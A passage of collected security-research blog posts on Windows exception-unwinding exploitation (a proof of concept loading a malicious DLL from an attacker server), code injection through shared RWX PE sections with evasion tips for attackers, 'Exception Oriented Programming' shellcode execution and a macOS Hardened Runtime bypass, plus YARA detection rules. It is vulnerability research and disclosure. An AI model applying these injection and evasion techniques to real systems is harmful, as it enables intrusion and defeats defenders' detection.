Remember how I said the fact that RCX was a writable location is still helpful? In the context of the __C_specific_handler, the first argument is an EXCEPTION_POINTERS structure which contains our exception and context record pointers. Fortunately, it doesn't matter what is stored initially, as RtlInitUnicodeStringEx doesn't care.

I couldn't use RtlInitUnicodeString because it leverages the RAX register (return value) as a "counter" representing the number of characters written, and we needed a return value of zero. RtlInitUnicodeStringEx, on the other hand, wraps this call and returns zero as long as our source string is not larger than SHRT_MAX.

This function lets us initialize RCX to point to a UNICODE_STRING containing whatever value we want. Many functions inside ntdll accept a UNICODE_STRING pointer; hence this was useful for expanding the accessible attack surface.

LdrLoadDll

What do we do with a UNICODE_STRING? One interesting attack idea I had was, "if all we want to do is execute arbitrary code remotely, does it really need to be shellcode?". For example, what's stopping us from loading a malicious DLL from our remote server?

NTSTATUS
NTAPI
LdrpLoadDll(
    PUNICODE_STRING DllName,
    PVOID DllPathState,
    ULONG Flags,
    PLDR_MODULE* ModuleOut
    );

LdrLoadDll wouldn't work directly as the DllPath needed to be a PWSTR, but all LdrLoadDll did was wrap a call to LdrpLoadDll, which did accept a UNICODE_STRING as its first argument.

Although this initially seemed like a good candidate, I ran into several issues during testing. So, to make my life easier, I created a test program that would emulate the conditions inside __C_specific_handler. For example, I called RtlInitUnicodeStringEx on a heap buffer containing random data, and I passed two arbitrary heap pointers in the Flags and ModuleOut arguments.

Flags being a pointer complicated things as different heap addresses would trigger different logic inside LdrpLoadDll. I had similar issues with the DllPathState containing a wide string.

Looking for alternatives, I used IDA Pro to check for cross-references to LdrpLoadDll. To my surprise, I found a function named LdrpLoadWow64 which took a single UNICODE_STRING argument. At a high level, the function:

Copies the UNICODE_STRING argument into a stack buffer.
Appends wow64.dll to this stack buffer.
Uses LdrpInitializeDllPath on the stack buffer, which "normalizes" a given path for LdrpLoadDll.
Calls LdrpLoadDll to load the DLL from the finalized path.

There are a few more operations this function does after the DLL is loaded, such as trying to parse certain exports, but that doesn't matter if we can get our arbitrary DLL loaded.

This appeared to be a great candidate because it took care of all the strange arguments LdrpLoadDll took, which we had little control over. If we could initialize RCX with a path to a malicious directory, LdrpLoadWow64 would append wow64.dll to it and load a DLL from that path!

Preparing the Demo

For the demo, I developed a sample "vulnerable application" compiled using Visual Studio's Clang/LLVM build tools. This example program has a small network protocol designed to fulfill our requirements for the attack:

The application allows a remote caller to request a leak of the ntdll base address and a pointer to a heap region allocated with a caller-specified size.
The application allows a remote caller to provide an arbitrary buffer to copy into the previously allocated heap buffer.
The application allows a remote caller to provide an arbitrary buffer to unsafely copy into a stack variable and then trigger an access violation exception.

Obviously, the requirements for this attack will be more complex in the real world. The method by which you meet the requirements will change depending on the context of the application you are exploiting. Therefore, in our sample PoC, these primitives are accessible through a simple interface, allowing us to focus on the unwinding process.

To perform the attack, I created a small Python script requiring a target IP and several offsets of functions inside your target's ntdll. Note that this exploit code was written to work against any target application, not just the one we developed for this demo. Of course, you would need to implement code to fulfill the requirements for the attack, but the nice part of the LdrpLoadWow64 methodology is that it is stable across different versions of Windows.

To up the stakes, I configured my target's "Exploit Protection" settings to require strict control flow guard and strict hardware-enforced stack protection. Given that our exploit never needs to return to a value that isn't on the shadow stack, this shouldn't cause issues, but it's always better to confirm these assumptions.

Demo

We start the demo by running the vulnerable application on our victim machine. To show you the attack step-by-step, I'm using IDA Pro remote debugging with WinDbg. After setting relevant breakpoints, we can start the exploit script on our remote attacker machine.

The PoC requests a leak for ntdll and some heap memory, copies the malicious heap buffer to the target, and triggers the overflow.

On our victim side, we can see an exception occurring inside the ProcessPacket function after the overflow buffer is overwritten as intended.

At this point, we can verify that hardware-enforced stack protection is enabled by running the WinDbg command rM 8002. This is a trick I learned from the Google Security blog discussing CET to see the shadow stack pointer (ssp) and whether CET is enabled (cetumsr). Since cetumsr is 1, we know that our previous exploit protection option took effect.

Once we pass this exception to the target, our corrupted call stack leads RtlDispatchException to call RtlpUnwindHandler, which is the exception handler for RtlpExecuteHandlerForUnwind. This is where the dispatcher context structure in RtlDispatchException is overwritten with our malicious dispatcher context pointer stored on the stack.

Next, __C_specific_handler calls RtlInitUnicodeStringEx, which initializes the ExceptionPointers variable to a UNICODE_STRING pointing at the wide string we specified in our EstablisherFrame.

The last step of the attack is a call to LdrpLoadWow64. By dumping the unicode string in RCX right before the call to LdrpLoadDll, we can see that it has been initialized to our initial directory path + wow64.dll.

Once we continue, we see the wow64.dll file being requested from our attacker server and a message box generated by our malicious DLL, completing the attack!

What Else Can We Do With This Attack?

Although we've gone through a minimal proof-of-concept, much more is possible with the CollidedUnwind primitive. Here are some highlights:

Using __C_specific_handler, we can trigger a call to RtlUnwind while controlling the function's internal state. RtlUnwind is more potent than RtlDispatchException as the changes you make to the context record will be reflected once execution continues at the unwind target.
In RtlDispatchException, a significant barrier to continuing the virtual unwind loop is that your Rsp must be within the stack's bounds. There are quite a few ways to get around this issue.
- One method was to use unwind operations to read the TlsExpansionBitmap in ntdll, which contained a pointer to the PEB. From here, we can go up to the TEB of our process and copy the StackBase or StackLimit fields into Rsp, allowing us to pass the bounds check.
Another challenge I faced with complex variants was the unwind info structure in RUNTIME_FUNCTION is located by adding a 32-bit address to the image base we controlled. For us to call arbitrary exception handlers, the image base would need to be the location of ntdll. For us to entirely control the unwind info structure, the image base would need to be the base of our heap.
- An interesting middle ground was that I could use any unwind info structure in ntdll to call any exception handler. This worked by subtracting the exception handler offset I didn't control from the target exception handler I wanted to call. This new value would be my image base, and I would specify an unwind info offset in my runtime function to account for this difference (i.e. real unwind info location minus my fake image base).

What About Linux?

We discussed how exception handling works on Windows and how we can weaponize structured exception handling to gain code execution. However, we didn't touch on how other operating systems like Linux are impacted by the same theory.

A few weeks ago, academic researchers from Vrije Universiteit Amsterdam and the University of California, Santa Barbara, released a paper titled, "Let Me Unwind That For You: Exceptions to Backward-Edge Protection". Their paper complements this article exceptionally well as they investigated how an attacker can abuse the unwinding process, but with a strong Linux and C++ focus.

If you enjoyed this article, I strongly encourage you to check out their work.

Tools

To access the tools and proof-of-concept mentioned in this article, please visit the Exception Oriented Programming repository.

Conclusion

In this article, we explored how an attacker can abuse fundamental weaknesses in the design of structured exception handling on Windows in the context of stack-based attacks. We started with the trivial approach to bypassing security cookies by triggering an exception into a handler that would return to our target. We investigated how although the MSVC compiler has mitigated this attack for fifteen years, much of the Windows ecosystem is still unprotected.

Next, we dove deep into the internals of the unwinding process on Windows, discovering how the unwind operations of legitimate functions can be weaponized by attackers to corrupt the state of an application. Finally, we discussed how Exception Oriented Programming is a compelling alternative to ROP when it comes to newer system mitigations such as hardware-enforced stack protection.

In our last section, we abused edge cases to achieve the modern-day equivalent of an SEH hijacking attack. We weaponized collided unwinds to gain code execution with strict hardware-enforced stack protection and control flow guard enabled.

I look forward to seeing if we can implement mitigations against these attacks in other compilers (and operating systems). There is quite a lot of opportunity to limit the attack surface currently exposed by the unwinding process, and I look forward to working with the broader compiler development community to see what can be done.

I hope you enjoyed reading this article as much as I enjoyed writing it. We covered a significant amount, and I appreciate those that stuck around.

Sharing is Caring: Abusing Shared Sections for Code Injection

Bill Demirkapi — Mon, 04 Apr 2022 16:00:00 GMT

Moving laterally across processes is a common technique seen in malware in order to spread across a system. In recent years, Microsoft has moved towards adding security telemetry to combat this threat through the "Microsoft-Windows-Threat-Intelligence" ETW provider.

This increased telemetry alongside existing methods such as ObRegisterCallbacks has made it difficult to move laterally without exposing malicious operations to kernel-visible telemetry. In this article, we will explore how to abuse certain quirks of PE Sections to place arbitrary shellcode into the memory of a remote process without requiring direct process access.

Background

Existing methods of moving laterally often involve dangerous API calls such as OpenProcess to gain a process handle accompanied by memory-related operations such as VirtualAlloc, VirtualProtect, or WriteProcessMemory. In recent years, the detection surface for these operations has increased.

For example, on older versions of Windows, one of the only cross-process API calls that kernel drivers had documented visibility into was the creation of process and thread handles via ObRegisterCallbacks.

The visibility introduced by Microsoft’s threat intelligence ETW provider has expanded to cover operations such as:

Read/Write virtual memory calls (EtwTiLogReadWriteVm).
Allocation of executable memory (EtwTiLogAllocExecVm).
Changing the protection of memory to executable (EtwTiLogProtectExecVm).
Mapping an executable section (EtwTiLogMapExecView).

Other methods of entering the context of another process typically come with other detection vectors. For example, another method of moving laterally may involve disk-based attacks such as Proxy Dll Injection. The problem with these sort-of attacks is that they often require writing malicious code to disk which is visible to kernel-based defensive solutions.

Since these visible operations are required by known methods of cross-process movement, one must start looking beyond existing methods for staying ahead of telemetry available to defenders.

Discovery

Recently I was investigating the extents you could corrupt a Portable Executable (PE) binary without impacting its usability. For example, could you corrupt a known malicious tool such as Mimikatz to an extent that wouldn't impact its operability but would break the image parsers built into anti-virus software?

Similar to ELF executables in Linux, Windows PE images are made up of "sections". For example, code is typically stored in a section called .text, mutable data can be found in .data, and read-only data is generally in .rdata. How does the operating system know what sections contain code or should be writable? Each section has "characteristics" which defines how they are allocated.

There are over 35 documented characteristics for PE sections. The most common include IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, and IMAGE_SCN_MEM_WRITE which define if a section should be executable, readable, and/or writeable. These only represent a small fraction of the possibilities for PE sections however.

When attempting to corrupt the PE section header, one specific flag caught my eye:

"IMAGE_SCN_MEM_SHARED" characteristic

According to Microsoft's documentation, the IMAGE_SCN_MEM_SHARED flag means that "the section can be shared in memory". What does this exactly mean? There isn't much documentation on the use of this flag online, but it turned out that if this flag is enabled, that section's memory is shared across all processes that have the image loaded. For example, if process A and B load a PE image with a section that is "shared" (and writable), any changes in the memory of that section in process A will be reflected in process B.

Some research relevant to the theory we will discuss in this article is DLL shared sections: a ghost of the past by Gynvael Coldwind. In his paper, Coldwind explored the potential vulnerabilities posed by binaries with PE sections that had the IMAGE_SCN_MEM_SHARED characteristic.

Coldwind explained that the risk posed by these PE images "is an old and well-known security problem" with a reference to an article from Microsoft published in 2004 titled Why shared sections are a security hole. The paper only focused on the threat posed by "Read/write shared sections" and "Read/only shared sections" without addressing a third option, "Read/write/execute shared sections".

Exploiting Shared Sections

Although the general risk of shared sections has been known by researchers and Microsoft themselves for quite some time, there has not been significant investigation to the potential abuse of shared sections that are readable, writable, and executable (RWX-S).

There is great offensive potential for RWX-S binaries because if you can cause a remote process to load an RWX-S binary of your choice, you now have an executable memory page in the remote process that can be modified without being visible to kernel-based defensive solutions. To inject code, an attacker could load an RWX-S binary into their process, edit the section with whatever malicious code they want in memory, load the RWX-S binary into the remote process, and the changes in their own process would be reflected in the victim process as well.

The action of loading the RWX-S binary itself would still be visible to defensive solutions, but as we will discuss in a later section, there are plenty of options for legitimate RWX-S binaries that are used outside of a malicious context.

There are a few noteworthy comments about using this technique:

An attacker must be able to load an RWX-S binary into the remote process. This binary does not need to contain any malicious code other than a PE section that is RWX-S.
If the RWX-S binary is x86, LoadLibrary calls inside of an x64 process will fail. x86 binaries can still be manually mapped inside x64 processes by opening the file, creating a section with the attribute SEC_IMAGE, and mapping a view of the section.
RWX-S binaries are not shared across sessions. RWX-S binaries are shared by unprivileged and privileged processes in the same session.
Modifications to shared sections are not written to disk. For example, the buffer returned by both ReadFile and mapping the image with the attribute SEC_COMMIT do not contain any modifications on the shared section. Only when the binary is mapped as SEC_IMAGE will these changes be present. This also means that any modifications to the shared section will not break the authenticode signature on disk.
Unless the used RWX-S binary has its entrypoint inside of the shared executable section, an attacker must be able to cause execution at an arbitrary address in the remote process. This does not require direct process access. For example, SetWindowsHookEx could be used to execute an arbitrary pointer in a module without direct process access.

In the next sections, we will cover practical implementations for this theory and the prevalence of RWX-S host binaries in the wild.

Patching Entrypoint to Gain Execution

In certain cases, the requirement for an attacker to be able to execute an arbitrary pointer in the remote process can be bypassed.

If the RWX-S host binary has its entrypoint located inside of an RWX-S section, then an attacker does not need a special execution method.

Instead, before loading the RWX-S host binary into the remote process, an attacker can patch the memory located at the image's entrypoint to represent any arbitrary shellcode to be executed. When the victim process loads the RWX-S host binary and attempts to execute the entrypoint, the attacker's shellcode will be executed instead.

Finding RWX-S Binaries In-the-Wild

One of the questions that this research attempts to address is "How widespread is the RWX-S threat?". For determining the prevalence of the technique, I used VirusTotal's Retrohunt functionality which allows users to "scan all the files sent to VirusTotal in the past 12 months with ... YARA rules".

For detecting unsigned RWX-S binaries in-the-wild, a custom YARA rule was created that checks for an RWX-S section in the PE image:

import "pe"

rule RWX_S_Search
{
	meta:
		description = "Detects RWX-S binaries."
		author = "Bill Demirkapi"
	condition:
		for any i in (0..pe.number_of_sections - 1): (
			(pe.sections[i].characteristics & pe.SECTION_MEM_READ) and
			(pe.sections[i].characteristics & pe.SECTION_MEM_EXECUTE) and
			(pe.sections[i].characteristics & pe.SECTION_MEM_WRITE) and
			(pe.sections[i].characteristics & pe.SECTION_MEM_SHARED) )
}

All this rule does is enumerate a binaries' PE sections and checks if it is readable, writable, executable, and shared.

When this rule was searched via Retrohunt, over 10,000 unsigned binaries were found (Retrohunt stops searching beyond 10,000 results).

When this rule was searched again with a slight modification to check that the PE image is for the MACHINE_AMD64 machine type, there were only 99 x64 RWX-S binaries.

This suggests that RWX-S binaries for x64 machines have been relatively uncommon for the past 12 months and indicates that defensive solutions may be able to filter for RWX-S binaries without significant noise on protected machines.

In order to detect signed RWX-S binaries, the YARA rule above was slightly modified to contain a check for authenticode signatures.

import "pe"

rule RWX_S_Signed_Search
{
	meta:
		description = "Detects RWX-S signed binaries. This only verifies that the image contains a signature, not that it is valid."
		author = "Bill Demirkapi"
	condition:
		for any i in (0..pe.number_of_sections - 1): (
			(pe.sections[i].characteristics & pe.SECTION_MEM_READ) and
			(pe.sections[i].characteristics & pe.SECTION_MEM_EXECUTE) and
			(pe.sections[i].characteristics & pe.SECTION_MEM_WRITE) and
			(pe.sections[i].characteristics & pe.SECTION_MEM_SHARED) )
		and pe.number_of_signatures > 0
}

Unfortunately with YARA rules, there is not an easy way to determine if a PE image contains an authenticode signature that has a valid certificate that has not expired or was signed with a valid timestamp during the certificate's life. This means that the YARA rule above will contain some false positives of binaries with invalid signatures. Since there were false positives, the rule above did not immediately provide a list of RWX-S binaries that have a valid authenticode signature. To extract signed binaries, a simple Python script was written that downloaded each sample below a detection threshold and verified the signature of each binary.

After this processing, approximately 15 unique binaries with valid authenticode signatures were found. As seen with unsigned binaries, signed RWX-S binaries are not significantly common in-the-wild for the past 12 months. Additionally, only 5 of the 15 unique signed binaries are for x64 machines. It is important to note that while this number may seem low, signed binaries are only a convenience and are certainly not required in most situations.

Abusing Unsigned RWX-S Binaries

Patching Unsigned Binaries

Given that mitigations such as User-Mode Code Integrity have not experienced widespread adoption, patching existing unsigned binaries still remains a viable method.

To abuse RWX-S sections with unsigned binaries, an attacker could:

Find a legitimate host unsigned DLL to patch.
Read the unsigned DLL into memory and patch a section's characteristics to be readable, writable, executable, and shared.
Write this new patched RWX-S host binary somewhere on disk before using it.

Here are a few suggestions for maintaining operational security:

It is recommended that an attacker does not patch an existing binary on disk. For example, if an attacker only modified the section characteristics of an existing binary and wrote this patch to the same path on disk, defensive solutions could detect that an RWX-S patch was applied to that existing file. Therefore, it is recommended that patched binaries be written to a different location on disk.
It is recommended that an attacker add other patches besides just RWX-S. This can be modifying other meaningless properties around the section's characteristics or modifying random parts of the code (it is important that these changes do not appear malicious). This is to make it harder to differentiate when an attacker has specifically applied an RWX-S patch on a binary.

Using Existing Unsigned Binaries

Creating a custom patched binary is not required. For example, using the YARA rule in the previous section, an attacker could use any of the existing unsigned RWX-S binaries that may be used in legitimate applications.

Abusing Signed RWX-S Binaries in the Kernel

Although there were only 15 signed RWX-S binaries discovered in the past 12 months, the fact that they have a valid authenticode signature can be useful during exploitation of processes that may require signed modules.

One interesting signed RWX-S binary that the search revealed was a signed driver. When attempting to test if shared sections are replicated from user-mode to kernel-mode, it was revealed that the memory is not shared, even when the image is mapped and modified by a process in Session 0.

Conclusion

Although the rarity of shared sections presents a unique opportunity for defenders to obtain high-fidelity telemetry, RWX-S binaries still serve as a powerful method that break common assumptions regarding cross-process memory allocation and execution. The primary challenge for defenders around this technique is its prevalence in unsigned code. It may be relatively simple to detect RWX-S binaries, but how do you tell if it is used in a legitimate application?

Abusing Exceptions for Code Execution, Part 1

Bill Demirkapi — Mon, 14 Feb 2022 20:11:41 GMT

A common offensive technique used by operators and malware developers alike has been to execute malicious code at runtime to avoid static detection. Often, methods of achieving runtime execution have focused on placing arbitrary code into executable memory that can then be executed.

In this article, we will explore a new approach to executing runtime code that does not rely on finding executable regions of memory, but instead relies on abusing existing trusted memory to execute arbitrary code.

Background

Some common methods of runtime execution include:

Allocating executable memory at runtime.
Abusing Windows Section objects.
Abusing existing RWX (read/write/execute) regions of memory allocated by legitimate code.
Loading legitimate binaries that include an RWX PE section that can be overwritten.

One common pattern in all these methods is that they have always had a heavy focus on placing arbitrary shellcode in executable regions of memory. Another technique that has not seen significant adoption in the malware community due to its technical complexity is Return-Oriented Programming (ROP).

As a brief summary, ROP is a common technique seen in memory corruption exploits where an attacker searches for “snippets of code” (gadgets) inside binaries that perform a desired instruction and soon after return to the caller. These “gadgets” can then be used in a chain to perform small operations that add up to a larger goal.

Although typically used for memory corruption exploits, there has been limited use in environments where attackers already have code execution. For example, in the Video Game Hacking industry, there have been open-source projects that allow cheaters to abuse ROP gadgets to execute simplified shellcode for the purposes of gaining an unfair advantage in a video game.

The greatest limitation with ROP for runtime execution however is that the instruction set of potential gadgets can be extremely limited and thus is challenging to port complex shellcode to.

As an attacker that already has execution in an environment, ROP is an inefficient method of performing arbitrary operations at runtime. For example, assume you are given the following assembly located in a legitimate binary:

imul eax, edx
add eax, edx
ret

Using ROP, an attacker could only abuse the add eax, edx instruction because any previous instructions are not followed by a return instruction.

On a broader scale, although legitimate binaries are filled with a variety of different instructions performing all-kinds of operations, the limitations of ROP prevent an attacker from using most of these legitimate instructions.

Continuing the example assembly provided, the reason an attacker could not abuse the initial imul eax, edx instruction without corrupting their output is because as soon as the imul instruction is executed, the execution flow of the program would simply continue to the next add eax, edx instruction.

Theory: Runtime Obfuscation

I propose a new method of abusing legitimate instructions already present in trusted code, Exception Oriented Programming. Exception Oriented Programming is the theory of chaining together instructions present in legitimate code and “stepping over” these instructions one-by-one using a single step exception to simulate the execution of arbitrary shellcode.

As a general method, the steps to performing Exception Oriented Programming given arbitrary shellcode are:

Setup the environment such that the program can intercept single step exceptions.
Split each assembly instruction in the arbitrary shellcode into their respective assembled bytes.
For each instruction, find an instance of the assembled bytes present in any legitimate module and store the memory location of these legitimate instructions.
Execute any code that will cause an exception that the exception handler created in Step 1 can intercept. This can be as simple as performing a call instruction on an int3 (0xCC) instruction.
In the exception handler, set the single step flag and set the instruction pointer register to the location of the next legitimate instruction for that shellcode.
Repeat Step 5 until all instructions of the shellcode are executed.

The largest benefit to this method is that Exception Oriented Programming has significantly less requirements than Return Oriented Programming for an attacker that already has execution capabilities.

Next, we will cover some practical implementations of this theory. Although the implementations you will see are operating system specific, the theory itself is not restricted to one operating system. Additionally, implementation suggestions will stick strictly to documented methods, however it may be possible to implement the theory via undocumented methods such as directly hooking ntdll!KiUserExceptionDispatcher.

Vectored Exception Handlers

In this section, we will explore how to use Vectored Exception Handlers (VEH) to implement the EOP theory. Vectored Exception Handlers are an extension to Structured Exception Handling on Windows and are not frame-based. VEH will be called for unhandled exceptions regardless of the exception's location.

The flow for the preparation stage of this implementation is as follows:

The application will register a VEH via the AddVectoredExceptionHandler Windows API.
The application will split each instruction of the given shellcode using any disassembler. For the example proof-of-concept, we will use the Zydis disassembler library.
For each split instruction, the application will attempt to find an instance of that instruction present in the executable memory of any loaded modules. These memory locations will be stored for later use by the exception handler.
The application will finish preparing by finding any instance of an int3 instruction (a single 0xCC byte). This instruction will be stored for use by the exception handler and is returned to the caller which will invoke the arbitrary shellcode.

Once the necessary memory locations have been found, the caller can invoke the arbitrary shellcode by executing the int3 instruction that was returned to them.

Once the caller has invoked the int3 instruction, the exception handler will be called with the code STATUS_BREAKPOINT. The exception handler should determine if this exception is for executing arbitrary shellcode by comparing the exception address with the previously stored location of the int3 instruction.
If the breakpoint is indeed for the arbitrary shellcode, then the exception handler should:
1. Retrieve the list of legitimate instructions needed to simulate the arbitrary shellcode.
2. Store these instructions in thread-local storage.
3. Set the instruction pointer to the first legitimate instruction to execute.
4. Set the Trap flag on the FLAGS register.
5. Continue execution.
The rest of the instructions will cause a STATUS_SINGLE_STEP exception. In these cases, the exception handler should:
1. Retrieve the list of legitimate instructions to execute from the thread-local storage.
2. Set the instruction pointer to the next legitimate instruction's memory location.
3. If this instruction is not the last instruction to execute, set the Trap flag on the FLAGS register. Otherwise, do not set the Trap flag.
4. Continue execution.

Assuming the shellcode ends with a return instruction, eventually the execution flow will be gracefully returned to the caller. A source code sample of Exception Oriented Programming through Vectored Exception Handlers is provided in a later section.

Structured Exception Handlers

Although Vectored Exception Handlers are great, they're not exactly stealthy. For example, an anti-virus could use user-mode hooks to detect when vectored exception handlers are registered. Obviously there are plenty of ways to bypass such mitigations, but if there are stealthier alternatives, why not give them a try?

One potential path I wanted to investigate for Exception Oriented Programming was using generic Structured Exception Handling (SEH). Given that VEH itself is an extension to SEH, why wouldn't frame-based SEH work too? Before we can dive into implementing Exception Oriented Programming with SEH, it's important to understand how SEH works.

void my_bad_code() {
    __try {
        __int3;
    } __except(EXCEPTION_EXECUTE_HANDLER) {
    	printf("Exception handler called!");
    }
}

Let's say you surround some code with a try/except SEH block. When an exception occurs in that code, how does the application know what exception handler to invoke?

Exception Directory of ntdll.dll

Nowadays SEH exception handling information is compiled into the binary, specifically the exception directory, detailing what regions of code are protected by an exception handler. When an exception occurs, this table is enumerated during an "unwinding process", which checks if the code that caused the exception or any of the callers on the stack have an SEH exception handler.

An important principle of Exception Oriented Programming is that your exception handler must be able to catch exceptions in the legitimate code that is being abused. The problem with SEH? If a function is already protected by an SEH exception handler, then when an exception occurs, the exception may never reach the exception handler of the caller.

This presents a challenge for Exception Oriented Programming, how do you determine whether a given function is protected by an incompatible exception handler?

Fortunately, the mere presence of an exception handler does not mean a region of code cannot be used. Unless the function for some reason would create a single step exception during normal operation or the function has a "catch all" handler, we can still use code from many functions protected by an exception handler.

To determine if a region of memory is compatible with Exception Oriented Programing:

Determine if the region of memory is registered as protected in the module's exception directory. This can be achieved by directly parsing the module or by using the function RtlLookupFunctionEntry, which searches for the exception directory entry for a given address.
If the region of memory is not protected by an exception handler (aka RtlLookupFunctionEntry returns NULL), then you can use this region of memory with no problem.
If the region of memory is protected by an exception handler, you must verify that the exception handler will not corrupt the stack. During the unwinding process, functions with an exception handler can define "unwind operations" to help clean up the stack from changes in the function's prolog. This can in turn corrupt the call stack when an exception is being handled.
1. To avoid this problem, check if the unwind operations contains either the UWOP_ALLOC_LARGE operation or the UWOP_ALLOC_SMALL operation. These were found to cause direct corruption to the call stack during testing.

Once compatible instruction locations are found within legitimate modules, how do you actually perform the Exception Oriented Programming attack with SEH? It's surprisingly simple.

With SEH exception handling using a try except block, you can define both an exception filter and the handler itself. When an exception occurs in the protected try except block, the exception filter you define determines whether or not the exception should be passed to the handler itself. The filter is defined as a parameter to the __except block:

void my_bad_code() {
    __try {
        __int3;
    } __except(MyExceptionFilter()) {
    	printf("Exception handler called!");
    }
}

In the example above, the exception filter is the function MyExceptionFilter and the handler is the code that simply prints that it was called. When registering a vectored exception handler, the handler function must be of the prototype typedef LONG(NTAPI* ExceptionHandler_t)(PEXCEPTION_POINTERS ExceptionInfo).

It turns out that the prototype for exception filters is actually compatible with the prototype above. What does this mean? We can reuse the same exception handler we wrote for the VEH implementation of Exception Oriented Programming by using it as an exception filter.

void my_bad_code() {
    __try {
        __int3;
    } __except(VectoredExceptionHandler(GetExceptionInformation())) {
    	printf("Exception handler called!");
    }
}

In the code above, the vectored exception handler is invoked using the GetExceptionInformation macro, which provides the function the exception information structure it can both read and modify.

That's all that you need to do to get Exception Oriented Programming working with standard SEH! Besides ensuring that the instruction locations found are compatible, the vectored exception handler is directly compatible when used as an exception filter.

Why is standard SEH significantly better than using VEH for Exception Oriented Programming? SEH is built into the binary itself and is used legitimately everywhere. Unlike vectored exception handling, there is no global function to register your handler.

From the perspective of static detection, there are practically no indicators that a given SEH handler is used for Exception Oriented Programming. Although dynamic detection may be possible, it is significantly harder to implement compared to if you were using Vectored Exception Handlers.

Bypassing the macOS Hardened Runtime

Up to this point, the examples around abuse of the method have been largely around the Windows operating system. In this section, we will discuss how we can abuse Exception Oriented Programming to bypass security mitigations on macOS, specifically parts of the Hardened Runtime.

The macOS Hardened Runtime is intended to provide "runtime integrity of your software by preventing certain classes of exploits, like code injection, dynamically linked library (DLL) hijacking, and process memory space tampering".

One security mitigation imposed by the Hardened Runtime is the restriction of just-in-time (JIT) compilation. For app developers, these restrictions can be bypassed by adding entitlements to disable certain protections.

The com.apple.security.cs.allow-jit entitlement allows an application to allocate writable/executable (WX) pages by using the MAP_JIT flag. A second alternative, the com.apple.security.cs.allow-unsigned-executable-memory entitlement, allows the application to allocate WX pages without the need of the MAP_JIT flag. With Exception Oriented Programming however, an attacker can execute just-in-time shellcode without needing any entitlements.

The flow for the preparation stage of this implementation is as follows:

The application will register a SIGTRAP signal handler using sigaction and the SA_SIGINFO flag.
The application will split each instruction of the given shellcode using any disassembler. For the example proof-of-concept, we will use the Zydis disassembler library.
For each split instruction, the application will attempt to find an instance of that instruction present in the executable memory of any loaded modules. Executable memory regions can be recursively enumerated using the mach_vm_region_recurse function. These memory locations will be stored for later use by the signal handler.
The application will finish preparing by finding any instance of an int3 instruction (a single 0xCC byte). This instruction will be stored for use by the signal handler and is returned to the caller which will invoke the arbitrary shellcode.

Once the necessary memory locations have been found, the caller can invoke the arbitrary shellcode by executing the int3 instruction that was returned to them.

Once the caller has invoked the int3 instruction, the signal handler will be called. The signal handler should determine if this exception is for executing arbitrary shellcode by comparing the fault address - 1 with the previously stored location of the int3 instruction. One must be subtracted from the fault address because in the SIGTRAP signal handler, the fault address points to the instruction pointer whereas we need the instruction that caused the exception.
If the breakpoint is indeed for the arbitrary shellcode, then the signal handler should:
1. Retrieve the list of legitimate instructions needed to simulate the arbitrary shellcode.
2. Store these instructions in thread-local storage.
3. Set the instruction pointer to the first legitimate instruction to execute.
4. Set the Trap flag on the FLAGS register.
5. Continue execution.
The rest of the instructions will call the signal handler, however, unlike Vectored Exception handlers, there is no error code passed differentiating a breakpoint and a single step exception. The signal handler can determine if the exception is for a legitimate instruction being executed by checking its thread-local storage for the previously set context. In these cases, the signal handler should:
1. Retrieve the list of legitimate instructions to execute from the thread-local storage.
2. Set the instruction pointer to the next legitimate instruction's memory location.
3. If this instruction is not the last instruction to execute, set the Trap flag on the FLAGS register. Otherwise, do not set the Trap flag.
4. Continue execution.

Assuming the shellcode ends with a return instruction, eventually the execution flow will be gracefully returned to the caller.

Exception Oriented Programming highlights a fundamental design flaw with the JIT restrictions present in the Hardened Runtime. The JIT mitigation assumes that to execute code "just-in-time", an attacker must have access to a WX page. In reality, an attacker can abuse a large amount of the instructions already present in legitimate modules to execute their own malicious shellcode.

Proof of Concept

Both the Windows and macOS proof-of-concept utilities can be accessed at this repository.

Conclusion

As seen with the new methodology in this article, code execution can be achieved without the need of dedicated memory for that code. When considering future research into runtime code execution, it is more effective to look at execution from a high-level perspective, an objective of executing the operations in a piece of code, instead of focusing on the requirements of existing methodology.

In part 2 of this series, we will explore how Exception Oriented Programming expands the possibilities for buffer overflow exploitation on Windows. We'll explore how to evade Microsoft's ROP mitigations such as security cookies and SafeSEH for gaining code execution from common vulnerabilities. Make sure to follow my Twitter to be amongst the first to know when this article has been published!

Parallel Discovery

Recently, another researcher (@x86matthew) published an article describing a similar idea to Exception Oriented Programming, implemented using vectored exception handlers for x86.

Whenever my research leads me to some new methodology I consider innovative, one practice I take is to publish a SHA256 hash of the idea, such that in the future, I can prove that I discovered a certain idea at a certain point in time. Fortunately, I followed this practice for Exception Oriented Programming.

On February 3rd, 2021, I created a public gist of the follow SHA256 hash:

5169c2b0b13a9b713b3d388e61eb007672e2377afd53720a61231491a4b627f7

To prove that this hash is a representation of a message summarizing Exception Oriented Programming, here is the message you can take a SHA256 hash of and compare to the published one above.

Instead of allocating executable memory to execute shellcode, split the shellcode into individual instructions, find modules in memory that have the instruction bytes in an executable section, then single step over those instructions (changing the RIP to the next instruction and so on).

Since the core idea was published by Matthew, I wanted to share my additional research in this article around stealthier SEH exception handlers and how the impact is not only limited to Windows. In a future article, I plan on sharing my additional research on how this methodology can be applied on previously unexploitable buffer overflow vulnerabilities on Windows.

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit

Bill Demirkapi — Fri, 07 Jan 2022 09:18:00 GMT

In the middle of August 2021, a special Word document was uploaded to VirusTotal by a user from Argentina. Although it was only detected by a single antivirus engine at the time, this sample turned out to be exploiting a zero day vulnerability in Microsoft Office to gain remote code execution.

Three weeks later, Microsoft published an advisory after being notified of the exploit by researchers from Mandiant and EXPMON. It took Microsoft nearly a month from the time the exploit was first uploaded to VirusTotal to publish a patch for the zero day.

In this blog post, I will be sharing my in-depth analysis of the several vulnerabilities abused by the attackers, how the exploit was patched, and how to port the exploit for a generic Internet Explorer environment.

First Look

A day after Microsoft published their advisory, I saw a tweet from the malware collection group @vxunderground offering a malicious payload for CVE-2021-40444 to blue/red teams.

I reached out to receive a copy, because why not? My curiosity has generally lead me in the right direction for my life and I was interested in seeing a Microsoft Word exploit that had been found in the wild.

With the payload in hand, one of the first steps I took was placing it into an isolated virtual machine with basic dynamic analysis tooling. Specifically, one of my favorite network monitoring utilities is Fiddler, a freemium tool that allows you to intercept web requests (including encrypted HTTPS traffic).

